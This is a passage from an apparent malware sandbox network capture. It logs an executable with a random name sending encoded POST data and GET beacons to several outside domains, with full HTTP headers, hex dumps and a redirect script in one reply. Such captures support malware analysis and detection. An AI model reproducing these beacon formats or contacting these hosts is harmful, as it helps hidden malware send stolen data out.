                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 5a 6b 34 65 2b 4d 76 58 6b 71 6c 63 54 2f 52 76 78 35 33 33 4e 69 4b 35 58 57 35 57 6e 52 38 45 4d 43 63 43 6c 61 6c 63 76 58 6f 62 2b 73 69 72 50 51 47 50 66 43 70 42 74 6f 46 50 54 42 6c 4b 54 62 73 6d 56 65 32 41 78 42 30 63 31 59 71 31 61 6e 79 6b 71 4b 32 37 70 33 61 76 32 2f 56 7a 55 73 58 64 77 75 5a 2b 58 70 38 71 4e 70 75 47 46 57 74 75 62 67 72 57 45 4e 6e 6d 7a 57 4d 63 61 73 4b 56 54 75 4b 4c 33 47 33 2f 39 6f 31 45 56 5a 59 5a 6e 6c 32 66 66 46 61 70 74 36 77 34 30 62 46 67 6f 36 6f 2f 51 75 64 4c 56 35 34 2f 54 69 6f 55 36 55 69 39 48 54 55 3d
                                              Data Ascii: vf5pwn=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnl2ffFapt6w40bFgo6o/QudLV54/TioU6Ui9HTU=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.5 | 49729 | 103.248.137.209 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:39.664932966 CEST | 786 | OUT | POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 4d 45 43 44 73 43 72 37 6c 63 71 58 6f 62 77 4d 69 75 42 77 47 49 66 43 56 7a 74 6f 4a 50 54 46 4e 4b 54 61 63 6d 57 70 43 44 78 52 30 65 36 34 71 33 56 48 79 6b 71 4b 32 37 70 30 6d 46 32 2f 4e 7a 55 64 48 64 78 4d 78 39 61 4a 38 70 64 35 75 47 4f 32 74 69 62 67 72 30 45 49 2f 41 7a 55 30 63 61 70 75 56 51 36 65 49 69 32 33 35 7a 49 31 4b 55 63 6c 54 69 6c 4b 58 44 30 48 76 73 59 45 6a 78 74 6f 4b 79 59 67 58 44 4f 78 7a 46 71 77 49 43 53 4a 39 67 33 79 4e 5a 45 43 37 75 36 77 72 7a 4d 2b 43 51 6c 72 66 31 78 6e 63 51 36 34 5a
                                              Data Ascii: vf5pwn=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDOxzFqwICSJ9g3yNZEC7u6wrzM+CQlrf1xncQ64Z


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.5 | 49730 | 103.248.137.209 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:42.211833954 CEST | 1803 | OUT | POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 45 45 43 78 6b 43 72 59 4e 63 74 58 6f 62 75 63 69 76 42 77 47 5a 66 43 4d 36 74 6f 31 66 54 48 46 4b 54 34 55 6d 43 4e 65 44 2b 52 30 65 78 59 71 32 61 6e 7a 6b 71 4a 4f 6e 70 30 32 46 32 2f 4e 7a 55 65 50 64 32 65 5a 39 4a 35 38 71 4e 70 75 42 46 57 74 4f 62 6b 50 4f 45 4a 4c 50 7a 6e 38 63 5a 4a 2b 56 41 63 69 49 67 57 33 37 2b 6f 30 4d 55 63 68 51 69 6d 75 78 44 30 7a 4a 73 62 55 6a 78 4d 4e 4a 72 4a 4d 32 57 75 78 53 4a 62 6f 79 65 32 52 4b 6e 32 65 4c 54 55 33 5a 73 65 74 48 38 38 44 48 55 45 36 6b 76 33 62 7a 51 76 68 59 67 4e 4a 7a 51 58 59 67 58 4c 51 74 66 6a 78 52 48 58 6d 33 71 72 66 41 6d 77 2b 4b 73 36 49 64 31 4c 4f 56 6a 54 47 58 4e 67 56 42 6f 69 58 45 52 50 43 58 50 59 42 6e 39 6b 62 76 32 34 4e 4b 51 32 73 4f 48 55 43 2b 7a 39 56 63 44 48 48 49 53 33 36 59 4d 66 73 78 31 54 73 32 5a 6a 71 75 53 6b 79 49 76 4d 75 70 38 32 6b 6d 43 76 39 [TRUNCATED]
                                              Data Ascii: vf5pwn=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 [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.5 | 49731 | 103.248.137.209 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:44.758128881 CEST | 522 | OUT | GET /5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.63582.photo
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.5 | 49732 | 3.33.130.190 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:24:19.382091999 CEST | 790 | OUT | POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 33 42 6d 39 69 4d 2b 62 67 30 34 4a 63 4f 6f 76 6e 6a 54 44 50 35 6c 48 2b 66 77 48 55 52 68 67 38 55 4e 31 42 67 6e 6c 49 52 79 6e 66 4b 42 65 50 52 4b 49 38 32 62 4a 77 33 31 36 65 67 5a 67 7a 63 49 53 6f 65 51 44 5a 35 33 36 2b 35 66 30 51 73 68 32 4d 76 67 4f 75 41 30 4e 78 57 44 32 58 69 2f 59 70 79 49 30 34 32 71 54 31 37 2b 31 33 6a 4c 7a 33 31 49 46 53 4d 51 70 53 4b 51 37 6f 62 53 61 49 4a 42 56 36 67 48 52 2b 58 34 31 44 56 63 38 65 42 66 64 72 4f 65 32 32 57 57 2b 6c 47 6a 5a 6f 78 2f 77 42 70 4b 46 36 45 4a 39 52 49 4b 6b 4a 53 6e 6a 65 2f 63 3d
                                              Data Ascii: vf5pwn=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eBfdrOe22WW+lGjZox/wBpKF6EJ9RIKkJSnje/c=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.5 | 49733 | 3.33.130.190 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:24:21.932420015 CEST | 810 | OUT | POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 31 67 2f 31 39 31 41 69 50 6c 45 78 79 6e 55 71 42 66 52 68 4b 58 38 32 6e 33 77 32 4a 36 65 67 4e 67 7a 65 51 53 6f 70 45 63 59 70 33 38 78 5a 65 79 65 4d 68 32 4d 76 67 4f 75 41 78 6f 78 56 7a 32 4c 43 50 59 72 51 67 37 32 57 71 51 32 37 2b 31 39 44 4c 33 33 31 4a 6f 53 4f 6b 58 53 50 4d 37 6f 66 57 61 5a 34 42 57 6a 51 48 58 36 58 35 69 4c 57 42 6d 57 79 6e 66 6f 4d 47 72 69 58 6d 65 6b 77 4f 7a 79 54 33 59 53 4a 6d 39 71 58 42 4b 41 34 72 4e 54 78 33 54 41 6f 4c 74 61 55 44 4a 34 45 62 6e 73 2f 79 65 36 61 58 66 55 70 44 2f
                                              Data Ascii: vf5pwn=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJm9qXBKA4rNTx3TAoLtaUDJ4Ebns/ye6aXfUpD/


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.5 | 49734 | 3.33.130.190 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:24:24.475020885 CEST | 1827 | OUT | POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 74 67 38 48 31 31 42 45 48 6c 46 78 79 6e 5a 4b 42 61 52 68 4c 4c 38 32 50 37 77 32 45 50 65 6b 39 67 79 2f 77 53 75 62 38 63 54 70 33 38 70 70 66 31 51 73 67 75 4d 72 46 4a 75 44 5a 6f 78 56 7a 32 4c 41 58 59 39 53 49 37 6d 6d 71 54 31 37 2f 36 33 6a 4c 50 33 30 74 57 53 4e 4a 69 54 37 41 37 70 2f 47 61 4b 71 35 57 38 67 48 56 39 58 35 71 4c 57 4d 34 57 79 72 31 6f 4e 6a 6a 69 51 53 65 6d 6c 54 62 67 41 43 4f 4d 49 53 61 76 56 5a 59 43 39 76 74 4f 33 7a 56 63 59 4c 4d 51 48 7a 6c 76 6a 7a 56 6f 64 6e 6d 75 4f 62 38 54 2b 2b 50 70 66 63 64 5a 43 68 7a 6c 74 63 2f 59 47 4d 74 2b 4f 6d 35 58 72 68 37 66 4c 42 42 73 4a 76 56 50 44 72 61 65 68 51 6a 49 33 45 74 34 77 39 4d 4a 4a 46 31 33 38 57 73 30 33 7a 5a 30 47 30 76 74 44 31 51 63 6e 51 63 74 54 42 7a 36 58 59 66 4e 53 37 7a 6f 44 51 4f 48 37 52 31 69 35 69 54 43 49 42 4d 6a 59 35 45 49 2b 49 5a 41 51 4b [TRUNCATED]
                                              Data Ascii: vf5pwn=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVjtg8H11BEHlFxynZKBaRhLL82P7w2EPek9gy/wSub8cTp38ppf1QsguMrFJuDZoxVz2LAXY9SI7mmqT17/63jLP30tWSNJiT7A7p/GaKq5W8gHV9X5qLWM4Wyr1oNjjiQSemlTbgACOMISavVZYC9vtO3zVcYLMQHzlvjzVodnmuOb8T++PpfcdZChzltc/YGMt+Om5Xrh7fLBBsJvVPDraehQjI3Et4w9MJJF138Ws03zZ0G0vtD1QcnQctTBz6XYfNS7zoDQOH7R1i5iTCIBMjY5EI+IZAQKi40hdQcHGi09DTEP58Qfxe+a8GwNMbONEbg57/R/tmI3/IkVEuk24QyVgNjg7aGtjeJr5oozQVRuWzy9VxOb2yu1u+N3T8GUHhCZP6/o7bzgH+ONUBO4Eor2b8Ib0caAEXgNTk1DvSHOYJLVsi2RVy6SemLLLNM6K2I/BLHzfRg3DpC2kC832vi4bSDY7vaZUbWqLqa3bJnv8TWwlPdJH2h99MCApdndEaYOPlS2gQ+zretGeLekMy8fJmH9XwGbQUSbcNk5dXZuxosgfs2yxbmfhhCQysRSE3o60cRfQKnrJsYmjUYEGJstkVzRhJECtupw88Rc3DAoQmv9j6f2sZ0dpTYboPRswbDlL6HY/xv8vZBpvV1mQo1vN6y+1IcIhvZ53LwR1S7bRrjD1PWo/C6ZBW+8NAtMTfc6KYAQ6mtOaq1ERW8wJKffYmfDYTBiF4VZeGFMptHFBobg7b/Aserl/CMjX+aUQJXaCSgThbkmomyqyvBHOourjguI7NI72+Jq8AUtPRzZH8CL73Sq2Z4rlOp05fIQVRRA3LXTRhKhzyfBLIt+5q7F9uGVc3NOScRMt7gw90Y4HtmyseN4EPTK1rvv2jasIqI0neMmPN04lxEE81JwGKGlUAXE4EMmOIJEYiy/k6575DVjxWSIq1mUsu2cgKikHX [TRUNCATED]


                                              Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:27.024223089 CEST | Bytes transferred: 530 | Direction: OUT | Data: GET /kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.asiapartnars.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Timestamp: Sep 26, 2024 15:24:27.492445946 CEST | Bytes transferred: 416 | Direction: IN | Data: HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:24:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 66 35 70 77 6e 3d 33 71 49 52 66 51 6c 2f 41 4b 64 6f 31 6d 79 58 6c 75 47 43 69 69 6b 67 45 49 4d 7a 6a 6b 66 59 5a 34 4e 6d 78 4a 6f 75 5a 44 73 74 38 6e 46 59 47 46 6d 66 4a 6a 7a 71 55 66 6b 36 56 45 6d 4c 38 31 76 35 6f 30 6c 46 5a 68 74 65 35 2b 67 44 78 2b 73 66 48 4f 2b 69 32 4e 65 36 58 38 31 63 47 37 6b 4e 7a 44 70 75 33 31 58 33 4e 53 6a 62 72 42 56 2b 39 45 53 6e 32 49 37 33 78 7a 75 34 71 51 3d 3d 26 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30"}</script></head></html>


                                              Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:32.550617933 CEST | Bytes transferred: 775 | Direction: OUT | Data: POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 33 56 70 65 76 4d 74 50 77 44 53 55 74 71 36 66 74 79 52 55 35 5a 54 33 78 31 50 44 4f 54 67 59 6a 62 59 65 2b 57 66 41 7a 58 33 56 50 56 79 4e 57 65 55 78 59 44 66 47 37 4c 77 7a 42 45 6c 61 61 2f 33 76 35 57 66 72 2b 67 42 62 63 54 31 4e 52 75 31 32 62 4a 57 6b 63 6e 33 46 47 51 70 77 64 79 67 67 6d 6e 75 6e 76 33 48 47 53 68 48 4b 32 77 49 67 49 5a 34 67 68 6b 55 52 57 4f 37 37 71 34 70 77 33 41 6b 4a 4c 66 33 71 61 42 36 34 6e 36 74 46 6a 52 72 4f 2f 49 62 59 37 6a 75 63 42 70 6d 55 2b 47 62 36 38 70 67 79 54 7a 35 34 76 65 2b 4e 41 62 64 77 6c 45 3d
                                              Data Ascii: vf5pwn=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFjRrO/IbY7jucBpmU+Gb68pgyTz54ve+NAbdwlE=


                                              Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 49737 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:35.102122068 CEST | Bytes transferred: 795 | Direction: OUT | Data: POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 33 67 59 47 2f 59 52 63 75 66 44 7a 58 33 41 2f 56 33 54 6d 65 62 78 59 66 39 47 36 6e 77 7a 42 67 6c 61 65 7a 33 6f 49 57 63 74 2b 67 50 64 63 54 33 4a 52 75 31 32 62 4a 57 6b 59 32 51 46 47 49 70 77 73 43 67 68 45 50 74 37 2f 33 41 53 43 68 48 62 6d 77 4d 67 49 59 62 67 6c 6c 63 52 55 32 37 37 71 49 70 77 6d 41 6e 41 4c 66 78 6c 36 41 30 78 6d 72 37 4e 6a 46 79 42 75 70 7a 48 35 6e 31 55 58 45 4d 4f 63 4f 7a 70 63 46 59 69 41 37 4f 70 66 2f 58 58 6a 4c 74 75 79 54 33 77 47 56 57 44 54 68 52 72 72 63 4d 53 36 50 77 72 45 66 6b
                                              Data Ascii: vf5pwn=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcFYiA7Opf/XXjLtuyT3wGVWDThRrrcMS6PwrEfk


                                              Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:37.648211002 CEST | Bytes transferred: 1812 | Direction: OUT | Data: POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 2f 67 59 77 7a 59 51 37 36 66 43 7a 58 33 63 76 56 32 54 6d 65 38 78 59 58 35 47 36 36 4e 7a 44 49 6c 61 37 76 33 70 36 75 63 34 4f 67 50 66 63 54 30 4e 52 75 61 32 59 68 53 6b 63 53 51 46 47 49 70 77 76 71 67 6b 6d 6e 74 35 2f 33 48 47 53 68 31 4b 32 77 6b 67 49 42 67 67 6c 68 4d 51 6c 57 37 37 4b 59 70 7a 55 59 6e 63 62 66 7a 78 61 42 70 78 6d 6d 6c 4e 69 70 2b 42 75 4d 59 48 37 33 31 46 47 6c 4b 4b 39 4b 49 7a 71 46 66 79 48 7a 59 78 6f 36 31 66 55 6e 70 69 68 7a 49 34 6c 39 66 4d 46 49 63 2f 2f 67 49 42 2b 6e 72 6b 53 75 4a 61 6d 55 6b 30 6c 4a 4c 53 67 54 33 47 59 7a 71 4c 4d 41 55 72 64 4a 7a 34 72 38 59 71 6d 31 32 70 56 4c 41 43 44 76 6f 56 6b 31 7a 66 30 45 67 2f 70 58 78 48 79 41 43 59 69 4c 65 75 42 32 4f 4d 79 6c 6c 73 32 2b 57 55 75 77 52 68 59 74 62 4d 69 35 6d 6f 30 48 74 49 31 37 75 58 54 56 67 73 2f 49 35 64 63 75 7a 66 53 57 4e 54 2f 4e [TRUNCATED]
                                              Data Ascii: vf5pwn=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 [TRUNCATED]


                                              Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 49739 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556 | Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp: Sep 26, 2024 15:24:40.196541071 CEST | Bytes transferred: 525 | Direction: OUT | Data: GET /al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.linkwave.cloud
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Timestamp: Sep 26, 2024 15:24:40.651166916 CEST | Bytes transferred: 416 | Direction: IN | Data: HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:24:40 GMT
